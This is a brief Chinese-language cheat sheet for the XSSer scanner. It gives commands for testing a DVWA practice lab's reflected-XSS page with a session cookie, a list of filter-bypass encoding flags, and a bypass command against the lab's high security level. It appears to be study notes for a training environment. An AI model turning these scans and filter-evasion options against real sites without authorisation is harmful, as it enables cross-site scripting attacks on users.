常用命令

xsser -u "http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low; PHPSESSID=d23e469411707ff8210717e67c521a81" -s -v --reverse-check
驗證是否存在xss
xsser -u "http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low; PHPSESSID=d23e469411707ff8210717e67c521a81" -s -v --heuristic

繞過命令

--Str Use method String.FromCharCode()
--Une Use Unescape() function
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding, with semicolons
--Dwo Encode vectors IP addresses in DWORD
--Doo Encode vectors IP addresses in Octal
--Cem=CEM Try -manually- different Character Encoding Mutations
(reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')
xsser -u "http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name=" -- cookie="security=high; PHPSESSID=d23e469411707ff8210717e67c521a81" -- Cem='Mix,Une,Str,Hex'

注入命令

其他命令

--gtk 開啟圖形化界面